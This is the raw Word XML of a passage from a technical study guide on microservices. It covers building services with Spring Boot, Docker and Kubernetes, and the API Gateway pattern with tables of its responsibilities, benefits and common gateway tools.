    <w:p w14:paraId="1B59932E"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56700AA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938" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23557253" w14:textId="16B8CDB2"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EA2F03"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hoose Tech Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200FA2D6"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pending on your ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E6A690"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mon choices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3590AC58"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nguage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java (Spring Boot), Node.js, Go, Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A307122"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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unication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> REST APIs, gRPC, Kafka, RabbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E459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939" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="610018C1" w14:textId="64C57736"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745FC4"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API Contract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC283B8" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="00DC20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OpenAPI/Swagger to define:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044215B"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points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C06F08"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Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517070FA"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Output models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB1650"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us codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83DFB0"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76CB90D"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orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51040934"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rders/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1F5C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940" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="519F47C9" w14:textId="489248BB"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w:t>
      </w:r>
      <w:r w:rsidR="000551AC"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sign the Database (DB per service pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6691B818"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should own its own data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5054E5"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rder Service DB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEA45F" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="000551A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d, userId, productId, status, createdDate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4CF83"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iquibase or Flyway for DB migrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9D04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941" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48C941" w14:textId="557301D3"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w:t>
      </w:r>
      <w:r w:rsidR="004976DE"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Build the Microservice (Spring Boot Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D8DB1"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Layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11994B"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 REST endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A328B7D"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 Business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E31EC"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pository – DB access (JPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116DF9B6"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TOs – For input/output models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43117FD4"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 Custom exceptions + Global handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1161B12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942" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5BD11" w14:textId="1563389F"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w:t>
      </w:r>
      <w:r w:rsidR="006763F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Inter-Service Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C33336"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 REST, gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38903FD0"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 Kafka, RabbitMQ (for decoupled event-driven designs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ECD3F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943" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F9CE4" w14:textId="676D57AE"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Cross-Cutting Concerns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B52B2B0" w14:textId="634BFCF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 SLF4J, Logback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9DFE4E" w14:textId="649DA8B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 Prometheus + Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31AD2F" w14:textId="1C4ED386"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ing – OpenTelemetry, Zipkin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDBC6A" w14:textId="30B730C4"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 OAuth2/JWT (Spring Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C20E4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944" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA25CA" w14:textId="082C0680"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rite Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E787D1D"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t tests for services and utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64AD5A"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tests for REST endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B6482"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 JUnit, Mockito, Testcontainers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512BB128"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945" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="143834E2" w14:textId="1F483704" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="00B5184B"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w:t>
      </w:r>
      <w:r w:rsidR="009A756E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Containerize with Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615D54F"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FROM open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0EA4EDCD"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COPY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 ap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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224E662" w14:textId="5637A9EE"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 xml:space="preserve">ENTRYPOINT </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jar"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CE3E7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946" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E406247"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ploy to Kubernetes (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37073D52"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Deployment, Service, and Ingress YAMLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC852A0"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Helm for templating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1683D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947" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBAB89"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Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698092F7"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 12-factor app principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492F2AA"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shared databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14740A9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e build &amp; deploy via CI/CD (GitHub Actions, Jenkins, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C6605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I Gateway (like Spring Cloud Gateway) for routing/authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A2F76"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 circuit breakers, retry, and rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB9D81"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948" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B210F" w14:textId="79C2B1F3" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="0090040A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="709" w:name="_Toc197867923"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>API Gateway pattern and its advantages</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="709"/>
    </w:p>
    <w:p w14:paraId="52907932" w14:textId="76892083" w:rsidR="009F0DEB" w:rsidRPr="00CE4B9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PI Gateway Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86458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949" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E6297"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n API Gateway?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9305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microservices architecture, clients would otherwise need to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0729E"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now the locations of multiple services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9D848"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 different protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C89645" w14:textId="1CA19BE4" w:rsidR="002A1C21" w:rsidRPr="00CE4B95" w:rsidRDefault="002A1C21">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multiple calls for a single operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB4DE6" w14:textId="4B9F8B78" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="002A1C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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950" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED7A86" w14:textId="77777777" w:rsidR="00393D00" w:rsidRPr="00CE4B95" w:rsidRDefault="00393D00" w:rsidP="009F0DEB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2054F1" w14:textId="77777777" w:rsidR="00393D00" w:rsidRPr="00CE4B95" w:rsidRDefault="00393D00" w:rsidP="009F0DEB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9D00DE" w14:textId="77777777" w:rsidR="00003D59" w:rsidRPr="00CE4B95" w:rsidRDefault="00003D59" w:rsidP="009F0DEB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A01084" w14:textId="16823462"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CE4B95" w14:paraId="70651DEC" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A65ED6"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esponsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D910B23"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2CF1228E" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7239C94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s requests to the appropriate backend microservice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="156CA9D1" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39C777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JWT tokens, API keys, OAuth2 credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="0F307681" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BB72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s traffic to prevent abuse or DDoS attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="06C05FE3" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="513EDE5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s load across multiple instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="05AFF458" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D2B2D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ifies headers, URL paths, or payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="182A8296" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3D869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backend load by returning cached responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="2CE13193" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E07E9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s all incoming/outgoing traffic for auditing and monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="61A94357" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5637A0AE"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results from multiple services into one response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="0EB47E57" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35895E1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protocols (e.g., HTTP to WebSocket, gRPC, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D5F906B"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951" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16343749"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CE4B95" w14:paraId="2A0185AD" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C3999E6"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9F0DEB" w:rsidRPr="00CE4B95" w14:paraId="697EAFBC" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1772009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 interact with one endpoint instead of many microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="09F8A3C3" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C28B39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 hides microservice topology and protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="2EECEC88" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22AF28D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go through a secure, audited, and controlled gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="107D9D40" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="523AE167"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cale API Gateway independently of the backend services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="288C1734" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E0664A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ugh caching, compression, and rate-limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="7B67210D" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2162FC0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erform routing based on request data like headers, path, or payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="6A5A1A94" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E6BF85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952" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C613B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CE4B95" w14:paraId="05456665" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EEF3C4E"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15B16736" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5275D6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based, for Spring Boot microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="28C8FC90" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D1342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gateway, succeeded by Spring Cloud Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="41B1DDA8" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="418DE4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ua-based, highly extensible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="252AB2C7" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F914C9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dely used, highly performant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="04892AA6" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72193A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gateway service for AWS environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="3CADF8C5" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D35DE1A"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gle Cloud’s enterprise API management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="6B78C1EC" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792D6F0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ith service mesh architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12B479AA"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953" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC3D36"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rchitecture with API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D54DC" w14:textId="70A7F24C" w:rsidR="00FC23F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC23F5" w:rsidP="00FC23F5">
      <w:pPr>
        <w:jc w:val="center"/>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Pr="00CE4B95"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954" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B91A9" w14:textId="5C8A5BCC" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00280198">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="710" w:name="_Toc197867924"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inter-service communication: REST vs Messaging</w:t>
      </w:r>
